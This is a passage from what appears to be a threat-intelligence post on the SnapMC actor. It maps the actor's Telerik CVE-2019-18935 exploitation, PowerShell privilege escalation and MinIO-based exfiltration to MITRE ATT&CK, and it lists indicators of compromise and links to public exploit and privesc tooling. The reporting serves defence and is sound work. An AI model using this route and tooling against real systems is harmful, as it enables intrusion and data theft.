vulnerability scanner to find systems running vulnerable Telerik software.Initial AccessT1190 – Exploit Public Facing Application(s)SnapMC exploited CVE-2019-18935 and SQL Injection.Privilege EscalationSnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.ExecutionT1059.001 – PowerShellSnapMC used a combination of publicly available PowerShell cmdlets.CollectionT1560.001 – Archive via UtilitySnapMC used 7zip to prepare data for exfiltration.ExfiltrationT1567 – Exfiltration over Web Service

T1567.002 – Exfiltration to Cloud StorageSnapMC used MinIO client (mc.exe) to exfiltrate data.MITRE ATT&CK Indicators of Compromise TypeDataNotesFile location + file nameC:\Windows\Temp[0-9]{10}.[0-9]{1,8}.dll
(Example: c:\Windows\Temp\1628862598.87034184.dll)File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and last part is randomly generatedFile location + file nameC:\Windows\Temp\7za.exe7zip archiving utilityFile names.ps1SQL cmdletFile namea.ps1SQL cmdletFile namex.ps1SQL cmdletFile name*.par.minioTemporary files created by MinIO during exfiltrationFile locationC:\Windows\Temp\Azure\Folder for temporary files created by MinIOFile locationC:\Windows\Temp\Vmware\Folder for temporary files created by MinIOFile namemc.exeMinIO clientHash651ed548d2e04881d0ff24f789767c0eMD5 hash of MinIO clientHashb4171d48df233978f8cf58081b8ad9dc51a6097fSHA1 hash of MinIO clientHash0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3eSHA265 hash of MinIO clientIndicators of Compromise References
  1. https://nvd.nist.gov/vuln/detail/CVE-2019-18935
  2. https://github.com/noperator/CVE-2019-18935
  3. https://github.com/calebstewart/CVE-2021-1675
  4. https://github.com/d0nkeys/redteam/tree/master/privilege-escalation
  5. https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/
  6. https://github.com/gushmazuko/WinBypass
  7. https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-PrivescAudit/
  8. https://min.io/
Categories: Security Posts

Thu, 1970/01/01 - 02:00
Syndicate content